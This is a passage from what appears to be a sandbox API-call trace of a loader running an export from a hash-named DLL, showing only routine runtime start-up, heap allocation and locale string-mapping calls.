¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0192.762] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100) returned 0x561080 [0192.762] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0192.762] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18e) returned 0x559ab0 [0192.762] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0192.762] GetLastError () returned 0x0 [0192.762] SetLastError (dwErrCode=0x0) [0192.762] GetEnvironmentStringsW () returned 0x564690* [0192.762] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9cc) returned 0x565070 [0192.763] FreeEnvironmentStringsW (penv=0x564690) returned 1 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x118) returned 0x55a360 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x560a50 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x5c) returned 0x550780 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x554c10 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x78) returned 0x55c700 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x555a50 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x55b420 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x55ffb0 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x55b4e0 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x5605f0 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x554980 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x55c780 [0192.763] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x554c80 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1c) returned 0x55b9c0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd2) returned 0x555ce0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x7c) returned 0x554010 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x560aa0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x90) returned 0x553c40 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b600 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x5549f0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x36) returned 0x555ac0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x560050 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x559630 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x5609b0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd6) returned 0x555620 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x5520e0 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55b570 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x552120 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x559150 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x559210 [0192.764] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b630 [0192.765] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x42) returned 0x560000 [0192.765] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x552160 [0192.765] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x560550 [0192.765] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b5a0 [0192.765] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565070 | out: hHeap=0x550000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1000) returned 0x564690 [0192.765] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0192.765] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0192.766] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" [0192.766] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x559780*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0192.767] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0192.771] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.771] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0192.772] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.772] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0192.772] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0192.773] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.773] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0192.774] GetProcessHeap () returned 0x550000 [0192.774] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.774] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0192.774] GetLastError () returned 0x0 [0192.774] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0192.774] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0192.774] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c8) returned 0x565b20 [0192.775] SetLastError (dwErrCode=0x0) [0192.775] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1200) returned 0x565ef0 [0192.777] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0192.777] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0192.777] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0192.777] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0192.777] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" [0192.778] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" [0192.778] GetACP () returned 0x4e4 [0192.778] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x228) returned 0x55acb0 [0192.778] IsValidCodePage (CodePage=0x4e4) returned 1 [0192.778] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0192.778] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0192.991] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.991] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0192.991] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0192.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0192.992] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.992] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0192.992] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.992] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0192.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0192.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0192.992] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.992] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0192.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0192.992] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0192.993] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1000) returned 0x567100 [0192.993] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0192.994] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0192.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0192.994] AreFileApisANSI () returned 1 [0192.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0192.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0192.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd7) returned 